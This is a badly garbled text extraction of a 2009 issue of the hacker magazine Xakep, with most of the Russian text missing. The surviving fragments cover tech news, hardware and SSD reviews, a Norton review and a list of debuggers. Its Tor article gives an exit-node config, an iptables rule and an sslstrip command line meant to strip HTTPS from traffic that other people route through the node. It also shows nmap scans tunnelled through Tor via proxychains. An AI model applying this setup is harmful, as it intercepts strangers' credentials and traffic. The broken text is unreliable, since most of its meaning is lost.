Вы находитесь на странице: 1из 148

INTRO

, . :
, , :). , , .
, , , . , 8.5 , 144 ,
, -. , , ,
, .
P.S. , : .
QIWI, , ,
.
!
nikitozz, . .
www.ring0cup.ru - !

004

MegaNews

016
018
024

Ferrum

084

CHAOS CONSTRUCTIONS 09
,

090

094

098

ASUS P7P55D Deluxe

SSD
ASUS U80V

,
Linux

Linux

026
034
038

PC_ZONE

TOR

Norton Internet Security?

102
106

046
052
056

EASY-HACK

BACKSTREET'S BACK!

-:

062

XSS

067

X-CONTEST

068

072
076
082

115
120


Microsoft Deployment Toolkit 2010:

Windows-



Microsoft

NAS !

NAS

126

IN DA FOCUS

128

IT-

1000 1 XSS-
-

SYN/ACK

110

Backstreet Boys

web- Zope

Pythona

042

WEB ZOPE

Open Source

134

PSYCHO:

140

FAQ UNITED


SQL-Injection PostgreSQL

143



X-TOOLS

144


FAQ
8.5

WWW2

web-

034

056

Web Application Firewall

052
110
/

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

ADMIN

ADMIN

> Unix-
Ant
>

/PUBLISHING
>

119021, , . ,
. 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL


(goryacheva@gameland.ru)
>






>

>
(strekneva@gameland.ru)
>

> -

>


(andrey@gameland.ru)
>


(devald@gameland.ru)
>


(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24

>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2009

MEGANEWS

MIFRILL MIFRILL@REAL.XAKEP.RU

MEGANEWS


Sony Ericsson:
Sony Ericsson MH907
,
,
,

. ,
, MH907

, ,
. ,

,

,

, ,
. -
-
,
164 , 25.32 .

39 . ,
,
Sony Ericsson,
Fast port.

, Skype
,
Skype eBay 3.1
. Joltid,
Skype. , eBay Joltid ,
, ,
.
Skype. eBay , Skype
. 65% Skype ,
35% - eBay.
, , , ,
Skype , , eBay .
eBay
, ,
. 2010 .

2010
.VIP .ECO.



,
256 .
13- , , , 12-. 256,
, , ,
:).
? !

,
3- (32% ).
004

X 10 /130/ 09

MEGANEWS
PC27


?

YouTube ,
,
.

(, ) YouTube ,
, , .
20 , -
,
. , YouTube
-
-, , , , ,
, ,
.

COMPUTERWORLD ,
GOOGLE CHROME 3.0 2.5
FIREFOX, 5 OPERA 10
9 IE8.


Google LiveJournal ,
, .
(Your Journal Your Money) ,
Google
AdSense. LJ ,
( )
. . ,
- , ,
. AdSense
( Google). , ,

, Google LiveJournal :).

AMD
, , ,
Intel . - ,
, Intel ,
,
AMD , 5% . Intel , , , , ,
, , ,
, . , ,
. -, HP, Dell, NEC, MSH ..

Intel. . Intel
( , , ),
.

006

X 10 /130/ 09

MEGANEWS

J3

PC27

!

, The Pirate Bay.
,
, TPB ,
( -, ,
TPB )
Kiosk of Piracy. ,
kopimi ,
Wi-Fi
.
kioskofpiracy.org ( ),
. ,

-, , ,
, . ,

, ,
,
. ,
,
, ,
. :

.
,

.

MCAFEE




400% .

008

OPERA SOFTWARE
OPERA 10,
40% OPERA 9.6.

IPOD

Apple, ,
iPod.
iPod
nano:
(
640480, H.264,

AAC), , FM-
, VoiceOver. ( 2.2" ). , ,
iPod nano .
.

iPod classic
160 . iPod shuffle (,

shuffle, Apple
Earphones In-ear Headphones)
Sony, V-MODA,
Klipsch Scosche. iPod touch
, Nano
. ,
,
Apple iPod
touch. - ,
touch ,
AppStore
, . ,
, ,
iPod touch .
X 10 /130/ 09

,
, ,
. ,
Microsoft
IT-, . -

MSDN (
,
)
Visusal Studio
(
,
).
- Microsoft ,
-. .

WebsiteSpark (www.microsoft.
com/rus/web/)
-,

. , ,

. ,
,
,
- ,

. ?


,
.
3
X 10 /130/ 09

Visual Studio 2008,


Professional Edition,

Expression Studio (1
) Expression Web
(2 ). ,

-
, Windows Web
Server 2008 SQL Server 2008
Web. -

-,

.
? -,
Visual Studio.
Express
Edition
unit-
.

,
,
.
,


.NET Expression

,
,
.

, PHP. ,

DotNetPanel

.


- ,
,
.
WebsiteSpark
Marketplace,


.

.
,
- ,

,
- .

,
,


.


MSDN
.

.
WebsiteSpark

.

,

100 . .

Microsoft
: .


MS,

Microsoft
-.

009

MEGANEWS

, , -,
.
DVD-, ,
Google, , Rambler Mail.ru.
, , , , , - 15% 10%
. , Google
DVD- , ,
, , , ,
.

HD-
Compro Technology
HD- VideoMate Network Media Centre 1000W,

, .
H.264
1080p (Full HD),
HD-
AVCHD ,
SATA-,
HDD.
,

LAN
802.11g,
BitTorrent-.
, , , - 1000W
,
.

,
.
, ,

,

.

010

X 10 /130/ 09

,

TV (yatv.ru), --
!, http://etoya.tv.
20- ,
, ,
. ,
, , , , - .
-,
- , , ,
. ,
,
.
,
, , . , ,
,
, .
, ,
SMS,
.

17% ,

,

.
X 10 /130/ 09

11

MEGANEWS


E-MAIL

,
(). Flash , -. LJ
, - Livejournal.com.
( ),
, Flash-, e-mail
. ,
Sup Fabric , . ,
100 . , SUP
- , , ,
.
,
Sup
.

,
Google ,
. ,
Rocky Mountain , 1325
.
,
Rocky Mountain ,
Google , .
Google ,
, . , , Google

(, , , ),
. ,
,
, ? e-mail
,
, ,
, - . ,
- ,
,
. , .

PROJECT NATAL

012

Project Natal.
Microsoft,
- .
Project Natal ( , ,
XBox 360, Natal ).
, , , ,
, . , ,
, ,
, , .
, , .
, TGS09 (Tokyo Game
Show) ,
Natal. Sega, Electronic Arts, Activision Blizzard
Capcom. , .
X 10 /130/ 09

SUPERJOB ,
69%
,
10%
.

X 0
18
0 /12
38
0/ 09


, - ,
,
. , ,
.

1.500
. -
, ,
( )
:
,
, : ,
, ... , ,
, 20
.
, ,
, . , ,

.

013
13

MEGANEWS


Microsoft ,
Microsoft
Security Essentials
.

( , )
Windows Defender
Windows 7, Vista XP,
. Security Essentials
-
.
, AV-Test
Microsoft
,

.
,

Forefront Protection Suite,
.

ASUS
, Asus
Eee, . , , , -
, Asus

. , e-ink , Asus Eee Book
,
.
,
, , Asus , Eee Book 3G, -
.
- , ,
170 .
.

vs -
.

, , ,
.
,
, -

014

300.000 ,
2 , .

.
, ,
.
X 10 /130/ 09


,
MI5 ( ) .
Cyber Security Operations Centre, ,
, -, ,
. - . , .
,
, , .
. ,
CSOC 50 -,
, , , , ()
.

IDC , 2.4%
- .

X 08 /128/ 09

015

FERRUM

ASUS P7P55D DELUXE


ASUS P7P55D DELUXE ,
Intel P55 Express Intel
Core i5. Asus Xtream Design

, .

,
ASUS. , ,
,
, ,
,
.

016

- ATX ,


,
.
, Intel P55 Express

,
: .
,
16+3 .


.


.

, .
DIMM,
DDR3,
.
PCI-Express X 10 /130/ 09

: INTEL CORE I5-750, 2.66


: INTEL BOX
: ASUS P7P55D DELUXE
: 2X 1024 , CORSAIR
DDR3-2133
: NVIDIA GEFORCE GTX 285
: 650 , CORSAIR TX650W
: MICROSOFT WINDOWS VISTA
ULTIMATE SP1 X32

: INTEL CORE I5
: LGA 1156
: INTEL P55 EXPRESS
: 4 DIMM, . 16 DDR32133/1600/1333/1066
: 3 PCI EXPRESS X16, 2X PCI
EXPRESS X1, 2X PCI
: 9 SATA, 1X UDMA
USB: 14 (6 + 8 )
:
REALTEK 8112L/8110SC
: 10- HDA- VIA VT2020
-, : ATX, 305X244

.
.
ASUS
Q-DIMM.

.
(!) USB, RJ-45, SPDIF/Out,
. CMOS.
(, )
. ,
,
. ,
-.
PCI-Express X16.
16,
. 4 ,
, ,
.
8X+8X.
.
,
.

SATA-. 6 ,
Intel Matrix Storage 9, RAID 0, 1, 5 10. SATA
. JMicron JMB322 Drive Xpert.

, MemOK!.
,
.
. ,


Super PI, mod 1.5 XS: 13,2
WinRAR 3.8: 1501 /
3DMark06, Overall: 15168
3DMark06, CPU: 4056
PCMark05, CPU: 7318
Lavalys Everest Ultimate, Memory Read: 15211
/
Lavalys Everest Ultimate, Memory Write: 13248
/c
Lavalys Everest Ultimate, Memory Latency: 42.4
Crysis, High Detail, 1680x1050: 63,1 FPS
Fallout 3, Medium, 1680x1050: 85,4 FPS
Far Cry 2, 1680x1050: 74,4 FPS
X 10 /130/ 09

PCI-Express.
8X+8X. ,
NVIDIA SLI,
AMD CrossFire. .
, 10-
( ) HDA- VIA.
Realtek, ASUS P7P55D Deluxe
. ,
,
. , . ASUS - ,
.
,
.
Turbo V.
.
, .
. , A, B C
( 3%, 7%
, ).
EPU,
.

Intel P55 Express


. ASUS

.
, , ,
.z

ASUS

www.xakep.ru
ASUS z. ,

5 ASUS
P7P55D.
PDA ASUS MyPal A686
ASUS: BT, -.
017

Kingston V
OCZ Technology

FERRUM

Samsung

: :

Intel
Kingston V

ung
A-Data
Tanscend

OCZ Technology

SSD

A-Data
Tanscend

OCZ Technolog

,
.
. , .
SSD,
.


:
,
\
.

Everest. h2benchw

.

PCMark05,
Windows XP,
, ,
.

,

018

, , ,
.

SSD (
Solid State Disk, )

. ?
. SSD ,
;
, ,
; , HDD.
, ,

SSD HDD
\ ( ,
),
, . ,
SSD- ,
,
.
SSD :
, ,
.
,

.
SATA.
.
X 10 /130/ 09

:
A-DATA S592
INTEL SSDSA2MH080G15E
KINGSTON V SERIES
OCZ TECHNOLOGY VERTEX SERIES
SAMSUNG MMDOE56G5MXP
TRANSCEND TS192GSSD25S-M

16000 .

ology

14000 .

A-DATA
S592
:

, : 128
-: 2,5
: SATA-II
, /C: 230
, /: 170

64 , A-Data S592
.
,
( General Usage PCMark05)
. ,
A-Data S592 ,
- .
, ,
, A-Data S592
.

, - ,
, .
X 10 /130/ 09

INTEL
SSDSA2MH080G15E
:

, : 80
-: 2,5
: SATA-II
, /C: 250
, /: 70

, Intel ,
.
SSD. Intel SSDSA2MH080G15E, ,
-
Windows XP
. PCMark
XP Startup Application Loading. , ,
,
. , ,
.

70 \,
64 \, 12.5 76.6 \. ,
. , . 80 ?
.

019

FERRUM

9500 .

16000 .

KINGSTON V
Series 128
:

, : 128
-: 2,5
: SATA-II
, /C: 100
, /: 80

, - ,
. , - no name,
Kingston, :
. ,
.
Kingston V Series 128, ,
, , SATA. .

,
. , , .
Kingston V Series 128
,
.

020

OCZ TECHNOLOGY
Vertex Series
:

, : 120
-: 2,5
: SATA-II
, /C: 250
, /: 180


. , .
, .
PCMark Virus Scan, Linear Read File Write. ,

, , OCZ
Technology Vertex Series 120 A-Data
S592, .

, , ,
. ,
1 , . , , , OCZ Technology
Vertex Series 120 .

X 10 /130/ 09

26000 .
17000 .

SAMSUNG
MMDOE56G5MXP

TRANSCEND
TS192GSSD25S-M

, : 256
-: 2,5
: SATA-II
, /C: 220
, /: 200

, : 192
-: 2,5
: SATA-II
, /C: 150
, /: 90


SSD-, HDD. ,
256 . , SSD
, . ,
, , ( ).
, ,
. ,
,
- . ,
, .

,
( ) . , -
, .

, -

X 10 /130/ 09

. , ,
Samsung, .
,
128 . , Virus Scan, XP Startup, General Usage
Application Loading PCMark05
. : ,
.

, .
. , , PCMark 05 Write File
Transcend, 38.3 \ Transcend TS192GSSD25S-M
. PCMark05,
, . ,
.

SSD-.

. ,
.


A-Data S592, OCZ Technology Vertex Series 120
.z

021

Kingston V

FERRUM

Samsung

PCMARK 05 XP STARTUP

EVEREST LINEAR READ

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb
/ 0

20

40

60

80

100


, Intel SSDSA2MH080G15E

20

40

60

80

100

10

20

30

40

50

60

, , ,

/ 0 50 100 150 200 250 300

/ 0 50 100 150 200 250 300

. ,
Intel

H2BENCHW RANDOM ACCESS READ

PCMARK 05 VIRUS SCAN

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb
0

50

100

150

200

250

, .
Transcend

0 0,05 0,1 0,15 0,2 0,25 0,3

H2BENCHW RANDOM ACCESS WRITE

PCMARK 05 FILE WRITE

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
A-Data
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb
0

50

100

150

200

250

022

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb

OCZ Technolog

EVEREST LINEAR WRITE

PCMARK 05 GENERAL USAGE

/ 0 50 100 150 200 250 300

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb

Intel . ,

Kingston V

EVEREST RANDOM READ

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb

(Kingston V Series 128 )


PCMARK 05 APPLICATION LOADING

A-Data
Tanscend

A-Data S592 128 Gb


Intel SSDSA2MH080G15E 80 Gb
Kingston V Series 128 Gb
OCZ Technology Vertex Series 120 Gb
Samsung MMDOE56G5MXP 256 Gb
Transcend TS192GSSD25S-M 192 Gb

0 100 200 300 400 500 600


X 10 /130/ 09

FERRUM

ASUS U80V


U-, ASUS U80V
Thin&Light, ,
. , ,
.

, ASUS U80V , Intel Centrino 2. : 4 , Intel Core 2 Duo T9550 2.66


ATI MR HD4570 512
.
LED- 1366x768 . ,
30% -
.
.

024

1:

,
, ASUS

.
U80V , , .
,
, .

X 10 /130/ 09

ASUS U80V

Intel Centrino 2
: Intel Core 2 Duo T9550, 2.66 , 6
L2. Enhanced Intel
SpeedStep, Intel EM64T, Intel Virtualization
Technology Execute Disable Bit.
: 4 ( 2 )
HDD: 320
: ATI MR HD4570 512
: 14" LED, 1366x768
WLAN: 802.11n, Bluetooth

:
, , , . ,
.

.
.

2:
802.11N
.
- , Wi-Fi, ,
802.11b 802.11g,
. HD , .
802.11n, U80V. !
: 70 /
!

3:
INTEL CORE 2 DUO
Intel Core 2 Duo T9550, 2.66 , ,
Intel:
Intel Virtualization Technology
Execute Disable Bit
Intel VT , .
,
, .
Execute Disable Bit,
,
.
, ,
XD-, . , -
,
- , XD-.

4:
ASUS SMARTLOGON
ASUS
SmartLogon, ,
web-. .
, SmartLogon

X 10 /130/ 09

,
logon . ,
,
.

5:
EXPRESS GATE
U-, U80V Express
Gate,
, Linux. Express Gate , . , 8
: , Skype, .
,
. ,
Express Gate .sqx/.idx/.bin , . SQX- ,
squashfs 3.0, squashfs-tools.
, Debian.
, version
md5- .
, , ASUS .
,
. USB-,
,
. ,
U50Vg , HDMI-.
:).

ASUS U80V ,
:
14" .

,
VMWare, .

ASUS U
trendclub.ru. Trend Club
, . Trend Club ,
,
. Trend Club Intel ASUS
.
Intel, , ,
, .
Intel Web-
Intel (http://www.intel.ru), http://blogs.intel.com.
Intel
www.intel.ru/rating. z

025

PC_ZONE
ANT ANTITSTER@GMAIL.COM

0%

100%

Tor


, TOR , . -,
. , -, ,
.
026

X 10 /130/ 09

TOR

TOR: 1

TOR- ( )
TOR

Tor, , . , ,
-,
,
. ,
,
,
, .
Tor, IP?
.
, , ,
, .
.
:).
Tor.
, ,
, !

...

Tor,
SOCKS-

X 10 /130/ 09

TOR-
,

027

PC_ZONE

WIRESHARK'

, TOR'

WARNING

warning


. ,
,

,

.

. , , (,
Sockscap), ,
TCP-. ,

( Bundles), Tor,
Firefox IM-
Pidgin. ! , Firefox' Torbutton
(addons.mozilla.org/firefox/addon/2275).
-.
Tor? .

(Node),
. ,
. , ,
.
.
,
( )
.
: ,
, , .
, , .
.

, , , ..
? . ,
,
,
.

(Exit Node), .
,
, :).
,
Tor ? ! ,
Tor' ,
, .

.

EXIT NODE!

, .
, Backtrack,
, Ubuntu .
, ,
.
Tor ( 0.2.1.19).

TOR
Tor .
Tor ,
-
,
.

028

-
.onion. Tor


.
,

( ) .

,
.
,
, .

X 10 /130/ 09

DVD
dvd

,

.

HTTP://WWW
links

SSLSTRIP
Vidalia, GUI- Vidalia
, , .
, Tor.
, , .
, .
Tor ,
. ,
,
, , .
-

, - Tor.
adduser
.
(, toruser): uid=111(toruser)
gid=10(wheel) groups=0(wheel),10(wheel).
, ,
Tor'. torrc,
.tor,
(.. /home/toruser). ,

.

EXIT NODE
, Exit Node',
.
IP
..

SQL-injection.
, :


.
:
2006 . ,
Tor -

X 10 /130/ 09

,

.
2007 .

(Dan Egerstad)

. 22-
Deranged Security

, , -

.
,
5 Tor
.
2007 .
,
Tor,
. ,
- ,


Tor.

Tor+Vidalia+
Proxomitron+
Freecap wsnow.
net/my_soft/41narushaya-zaprety.
html.
OperaTor Opera+
Tor+Polipo
archetwist.com/en/
opera/operator.
Portable Tor

Tor,
portabletor.
sourceforge.net.
Torbutton Firefox,


Tor.



addons.
mozilla.org/ru/firefox/
addon/2275.
Vuze

BitTorrent
Tor azureus.
sourceforge.net.

Tor: www.
torproject.org/docs/
tor-doc-relay.html.ru.
:
www.torproject.org/
tor-manual.html.
: www.
torproject.org/docs/
tor-hidden-service.
html.ru.

029

PC_ZONE

,
Tor, ,
.
, toruser ( su
toruser)
Tor',
-:
$ tor -f /home/toruser/.tor/torrc

IPTABLES HTTP TOR' SSLSTRIP


: vi /home/toruser/.tor/
torrc .
, Tor'

.
, Vidalia
Settings/Sharing (Run
as a client only)
(Relay traffic for the Tor network),
. ,
.
, Tor' Exit node,
:
ControlPort 9051
DirPort 9030
ExitPolicy accept *:80,accept
*:443,accept *:110,accept
*:143,accept *:993,accept
*:995,reject *:*
HashedControlPassword 16:91495A0B7
CBC41C76073E1EC00A5CF1510D41462884
391CCB24BF489F1
Log notice stdout
Nickname HelloXakep
ORPort 9001
SocksListenAddress 127.0.0.1

:
ControlPort , Tor
. -

030

: Vidalia , , Tork.
.
DirPort
.
9030 .
ExitPolicy , , Tor
,
.
: ExitPolicy Accept
| Reject address:port. , Tor', ( , HTTP-, 80 ), .
:
,
rapidshare.com , .
HashedControlPassword
Tor- (
),
: tor --hash-password.
Nickname ,
.
ORPort ,
.
SocksListenAddress ,
Tor ,
SOCKS. ,
9050-. ,
,
Tor Privoxy .
, ,
.

,
,
. ,
.
20 . Self-testing indicates your ORPort
is reachable from the outside. Excellent.
, ,
.

,
( , ) .
, ,
.
http://
moria.seul.org:9032/tor/status/authority
nickname ,
, ,
.
,

,
.
(..
HelloHacker) .
- s Exit Fast
Running V2Dir Valid, Exit Node!

, ,

, , ,
-

. ? .
Tor'

, ActiveX,
Java Flash IP-. unmasking Unmasking TOR Users (www.fortconsult.
net/images/pdf/tpr_100506.pdf).
.
Wireshark (www.
wireshark.org) ,
,
, . .
:).
... ,
X 10 /130/ 09

( 67
)
.
HTTPS

( ,
). ,
sslstip (www.thoughtcrime.org/software/
sslstrip). BlackHat2009 Moxie Marlinspike

(, BlackHat
DVD),
Man-inthe-Middle
.
, sslstip, ( ,
sslstrip, ) ,

:
$ python sslstrip.py -a -l 8080 -w
today.log

,
Tor, ,
.
, sslstrip.
iptables :
$ iptables -t nat -I OUTPUT -p tcp
-m owner -uid-owner 111 --dport
80 -j DNAT --to-destination
127.0.0.1:8080
X 10 /130/ 09

-uid-owner
id toruser.
HTTP- toruser
ssltrip ( 127.0.0.1:8080)
.
:

NAT, , .

,
sslstrip
,
SSL. ,
Tor :).

,
.
. c -

,
,

IP?
Tor, ,
, ? :)
,
Tor-,
, .
:
1. Tor, IP-
.
2. proxychains (proxychains.sourceforge.net)

Nmap' Tor.
3. tortunnel (www.thoughtcrime.org/software/
tortunnel),
torproxy
. .
, Nmap
Socks,
.
proxychains, proxychains.conf ,
,
Tor-:
Socks4 127.0.0.1 9050

, Tor,
proxychains, ,
: proxychains nmap -PN
92.241.175.142. IP-
www.xakep.ru, -PN .
, ICMP-,
.
.
(, , Tor) .
,

Tor. , SYN-,


Anonym.OS (sourceforge.net/projects/
anonym-os) LiveCD OpenBSD,
,

Tor.
ELE (northernsecurity.net/download/ele/)
Damn Small Linux Dillo+Tor+Privoxy+Scroogle.
Incognito LiveCD (anonymityanywhere.
com/incognito) Gentoo,
LiveC Tor', TrueCrypt, KeePassX.

Phantomix (phantomix.ytternhagen.de)
LiveCD-,

Tor Privoxy.
Tor-ramdisk (opensource.dyc.edu/
tor-ramdisk) Linux, , Tor
,

. .

031

PC_ZONE

.
( ),
. c
proxychains.conf :
forward-socks5
/
127.0.0.1:5060 .


Nmap ,

. -
- ,
.
, Nmap
, , ,

( -sT) Tor: proxychains nmap -sT -PN
92.241.175.142. ,
Nmap
ICMP- (
) , . ,
, -PN, .
ICMP-,
, . ,
: iptables -A OUTPUT -dest
92.241.175.142 -j DROP.


. ,
.
,
,
, ,
. ,
.
torrtunnel,
,
.

,

.

boost (www.
boost.org).
, :
$ bootstrap.sh --libdir=/usr/lib
--includedir=/usr/include

032

$ ./bjam --prefix=/usr
$ ./bjam install

,
/usr/include/boost, /usr/lib.
libboost_system.so.1.40.0 (,
, ):
$ ln -s /usr/lib/libboost_
system.so.1.40.0 /usr/lib/
libboost_system-mt.so

, tortunnel

. tortunnel' torproxy,
IP-
.
:
?.
http://128.31.0.34:9031/tor/status/
all http://moria.seul.org:9032/tor/status/
authority Exit, Fast, Stable, Valid.
, :).
.
torproxy: ./
torproxy [ExitNodeIP].
, torproxy 5060 .
,

Nmap'. /etc/proxychains.conf,
Socks4 127.0.0.1 9050
torproxy-,
: socks5 127.0.0.1 5060. ,
, .
, Nmap
proxychains,
.

HTTP- 127.0.0.1:8118.
http://torcheck.xenobite.eu/
index.php ,
Tor. , Your IP is
identified to be a Tor-EXIT. ,
:).

, Tor
. , Tor, , ,
Gmail ?
sslstrip'a? ! tortunnel
torscanner, Exit Node',
sslstrip. :
URL ,
HTTPS-(),
Exit
Node' , , .
,
.
torscanner
destinationHost destinationPort
request. : torscanner www.
google.ru 80 / > 1.txt. 1.txt,
HTTPS
HTTP,
sslstrip.
, Torscanner
,
. ,
,

.

:)

Tor,
. , ,
.
,
sslstrip,
,
. , Tor

. .z
X 10 /130/ 09

PC_ZONE
STEP TWITTER.COM/STEPAH


NORTON INTERNET

SECURITY?

,
, .
, , ,
. , NORTON
INTERNET SECURITY.
, Norton,

.
? ,
, ,

034

.
, . ...
Symantec' :

,
.
,


Norton
Antivirus/Norton Internet Security 2010
,
.
,
,
.
X 10 /130/ 09

SYSTEM INSIGHT: ,

, , Symantec
,

( ),
,
.
,
,
. Symantec
.
,
,
.
? ,

. Quorum, , ,
, :
,

Norton Community Watch,
,
, .

,
,
.
Quorum , ,
.

Symantec
X 10 /130/ 09

.
3- Norton Internet Security Norton
Antivirus 2010.

Quorum .

,
- Symantec .

Quorum Norton Internet
Security 2010 Norton AntiVirus 2010

. Download Insight

,
Quorum. , , ,
,
. ,

, ,
,
Symantec ,
Symantec
.
?
,
Insight protections
Details,
. 65
. 51,5
, 10
.
. (EXE, DLL ..)
:

:
6

Norton (Norton Trusted), (Comminity Trusted),


(Unprove). ,
, . , 84%
Norton',
.
,
, , , ,
.
File insight

. ?
-, . ? ? ?
,

,

. ,
Norton Files Insight.

,
, , SONAR (Symantec
Online Network for Advanced Response).

SONAR

,

-. -

035

PC_ZONE

IDLE-MODE

INFO

info
Norton 360

- 2011

,
2010 , ,


.

DVD
dvd

Norton
Internet Secirity 2010
90
.

036

SONAR,
.
, SONAR.
,
- - -. ,
,
. : SONAR
.
, ,
. SONAR'
, NIS ,
.
, -
.
- -
, NIS, , 200 . ,
,
.
200-300 . ,
.
,
SONAR',
,
. .
, ,
- ,
. , ,
.

SONAR.
. -
,
, ..,
Norton .
.
adv2.exe,
, . , - ,
. ,
, ,
, .
, . Quorom
-


, .
,
.
- , , .
!

NIS Norton Tasks.


. ,
NIS',
Idle-, .. , .
,
, ,
.
,
Idle Quick Scan.

. , Symantec,
2009 ,
. 2010
.
,
,
10 !
, NIS ,
, .
, :
( , ,
, ) .
NIS, Firewall rules were
automatically created for x-lite.

Performance.
,
CPU
Norton.
Norton insight.
, . :
;
X 10 /130/ 09

GOOGLE, YAHOO BING


;
;
- ;
/ ;
..
(, ). ? ,
,
, . , .
, NIS , .

Download insight.
, NIS
, . ,
SONAR , , .
.
, Norton X 10 /130/ 09

Internet Explorer' Firefox. Opera


Chrome .
Safe Web,
(, , ).
Symantec ,
-.
,
.
Windows XP, ,
. ,
xakep.ru, ,
. . ,
Temporary Internet Files (, ..),
.
- ( ), Drive By Download. ,
,
. Norton (
),
. .
, Cnn.ocm 6.5 .

(Norton Identity Safe).
, .
NIS 2010 . 2010
,
, Brightmail,
Norton 6 .
,
. Brightmare .

, . ,
,
. .
NIS iframe,
, .
,
. ? , . z

037

PC_ZONE
STEP TWITR.COM/STEPAH



z . ,
, , . . , .
, .

, , .
,
? :).
.
, , ,

.

OllyDbg
www.ollydbg.de

,
,
Cr@wler,
. 32- , ring-3
.

. OllyDbg ,
, , , ,
API,
.. , !
. ? OllyDbg
user-land ,
, .
,
,
, . ,
MS Debugging API
,

038

32-


PYTHON IMMUNITY DEBUGGER

.
OllyDbg 1.10, -
. ,
,

, :
.

, .
searchcrypt.py,
: AES, BLOWFISH, CAMELLIA,
CAST, MD5, RC2, RC5, RIPEMD160, SHA1,
SHA256, SHA512.
,
.
,
(-!)
.
, Immunity Debugger
, proof-of-concept
expolit,
.

Immunity Debugger
www.immunitysec.com/
products-immdbg.shtml

OllyDbg , .

CANVAS Python,
, Immunity Debugger
Python. , , ,


,
. Immunity
Debuggers Python API

SoftICE
google.com :)

( ,
)
Windows, .
X 10 /130/ 09



(, OllyDbg) SoftICE
Windows,
.
MS Debugging API
, , ,
SoftICE ,

.
.
SoftICE NuMega,

Driver Studio,
Compuware. ,
SoftICE Windows XP? ,
, .

2006 .
.

Microsoft Debugger
http://www.microsoft.com/
whdc/devtools/ddk
Microsoft Debugging Tools,

MICROSOFT

Microsoft Debugger, SDK,


, ,
, .

Windows
Driver Kit ( Driver Development Kit
DDK).
Microsoft Debugger
(.. ring-3),
.
, , ,
COM- . ,

Microsoft, x64- .
Microsoft Debugger
: windbg.exe cdb.exe
.
dbgeng.dll, , ,

.

Syser Kernel Debugger


www.sysersoft.com

:
SoftICE, Syser Microsoft Kernel Debugger,
SoftICE Server 2008,
Microsoft Kernel Debugger
.
Syser,
.
Wu YanFeng Chen JunHao.
, Syser
, , .
IDA Pro,
SoftICE, OllyDbg. Syser
, ,
SoftICE,
. : ,
, Ring 3
Ring 0.
.
, Syser SoftICE,
, ,
. ,
, , , ,

Microsoft Kernel Debugger.

GDB
sourceware.org/gdb

GNU Debugger
UNIX,
,
C++.
X 10 /130/ 09


,
,
Xxgdb (en.wikipedia.org/wiki/Xxgdb), DDD
(www.gnu.org/software/ddd), KDbg (www.kdbg.
org), Xcode (developer.apple.com).

,
. GDB ptrace
( , ). ,
GDB
, , . , GDB -


, ,
Linice (www.linice.com)
SoftICE Linux.

IDA Pro
www.hex-rays.com/idapro

IDA Pro
.

,
.
, , ring-3
. MS Debugging API ( NT)
ptrace ( UNIX),
.
IDA Pro
,
6 1991 .

039

PC_ZONE

IDA PRO

C-

HEX-RAYS

, .

,
, ,
. ,
IDA Pro
, ,
.
.
, IDA
, ,

, .

,

CLOUD


IDC. , IdaRUB (www.
metasploit.com/users/spoonm/idarub) Ruby, IDAPython (www.d-dome.net/idapython) Python. , ,
5.4, IDAPython
IDA.

Hex-Rays
www.hex-rays.com

IDA Pro ,

, ,
. Hex-Rays
,
IDA Pro.
, , HexRays C -

WINDBG

WARNING

warning

.
,
,
, .

DVD
dvd
,

,

DVD-.

040

X 10 /130/ 09

, DEPLHI/
C BUILDER
. ,

,

, .

Hex-Rays .

W32DASM

, . , , , ,

, ... W32DASM
,
, ,
. ,
,
HOWTO
(#80 z, PDF
).

DeDe


,
Delphi Builder, ,
GetWindowTextA, . , Delphi/Borland
C++ Builder, . , VCL Borland, ,
DeDe.
,
Delphi,
.
DaFixer, ,
,
. ,
Delphi,
:
Delphi (PDF-
).

?
VB DECOMPILER ][

native-. .NET

